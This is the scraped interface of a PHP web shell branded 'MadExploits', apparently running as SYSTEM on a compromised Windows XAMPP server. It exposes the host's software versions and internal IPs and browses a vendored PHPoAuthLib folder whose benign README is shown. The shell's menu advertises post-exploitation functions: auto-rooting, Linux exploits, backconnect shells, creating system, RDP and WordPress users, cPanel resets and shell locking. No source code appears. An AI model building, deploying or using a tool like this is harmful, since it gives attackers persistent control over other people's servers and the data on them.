Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
htdocs /
edgpens /
vendor /
lusitanian /
oauth /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxrwxrwx
LICENSE
1.11
KB
-rw-rw-rw-
README.md
4.15
KB
-rw-rw-rw-
composer.json
1.21
KB
-rw-rw-rw-
composer.lock
21.03
KB
-rw-rw-rw-
phpunit.xml.dist
1.9
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
PHPoAuthLib =========== **NOTE: I'm looking for someone who could help to maintain this package alongside me, just because I don't have a ton of time to devote to it. However, I'm still going to keep trying to pay attention to PRs, etc.** PHPoAuthLib provides oAuth support in PHP 5.3+ and is very easy to integrate with any project which requires an oAuth client. [](https://travis-ci.org/Lusitanian/PHPoAuthLib) [](https://scrutinizer-ci.com/g/Lusitanian/PHPoAuthLib/) [](https://scrutinizer-ci.com/g/Lusitanian/PHPoAuthLib/) [](https://packagist.org/packages/lusitanian/oauth) [](https://packagist.org/packages/lusitanian/oauth) Installation ------------ This library can be found on [Packagist](https://packagist.org/packages/lusitanian/oauth). The recommended way to install this is through [composer](http://getcomposer.org). Edit your `composer.json` and add: ```json { "require": { "lusitanian/oauth": "~0.3" } } ``` And install dependencies: ```bash $ curl -sS https://getcomposer.org/installer | php $ php composer.phar install ``` Features -------- - PSR-0 compliant for easy interoperability - Fully extensible in every facet. - You can implement any service with any custom requirements by extending the protocol version's `AbstractService` implementation. - You can use any HTTP client you desire, just create a class utilizing it which implements `OAuth\Common\Http\ClientInterface` (two implementations are included) - You can use any storage mechanism for tokens. By default, session, in-memory and Redis.io (requires PHPRedis) storage mechanisms are included. Implement additional mechanisms by implementing `OAuth\Common\Token\TokenStorageInterface`. Service support --------------- The library supports both oAuth 1.x and oAuth 2.0 compliant services. A list of currently implemented services can be found below. Included service implementations -------------------------------- - OAuth1 - 500px - BitBucket - Etsy - FitBit - Flickr - QuickBooks - Scoop.it! - Tumblr - Twitter - Xing - Yahoo - OAuth2 - Amazon - BitLy - Bitrix24 - Box - Buffer - Dailymotion - Delicious - Deezer - DeviantArt - Dropbox - Eve Online - Facebook - Foursquare - GitHub - Google - Harvest - Heroku - Hubic - Instagram - Jawbone UP - LinkedIn - Mailchimp - Microsoft - Mondo - Nest - Netatmo - Parrot Flower Power - PayPal - Pinterest - Pocket - Reddit - RunKeeper - Salesforce - SoundCloud - Spotify - Strava - Ustream - Vimeo - Vkontakte - Yahoo - Yammer - more to come! Examples -------- Examples of basic usage are located in the examples/ directory. Usage ------ For usage with complete auth flow, please see the examples. More in-depth documentation will come with release 1.0. Framework Integration --------------------- * Lithium: Sébastien Charrier has written [an adapter](https://github.com/scharrier/li3_socialauth) for the library. * Laravel 4: Dariusz Prząda has written [a service provider](https://github.com/artdarek/oauth-4-laravel) for the library. * Laravel 5: Valentin Ivaşcu ported Dariusz Prząda's Laravel 4 library to [Laravel 5](https://github.com/oriceon/oauth-5-laravel). * Symfony: Alexander Pinnecke has written [a Symfony Bundle](https://github.com/apinnecke/OAuthBundle) for the library. Extensions ---------- * Extract normalized user data from OAuth Services with the library [PHPoAuthUserData](https://github.com/Oryzone/PHPoAuthUserData) by Luciano Mammino Tests ------ To run the tests, you must install dependencies with `composer install --dev`
Close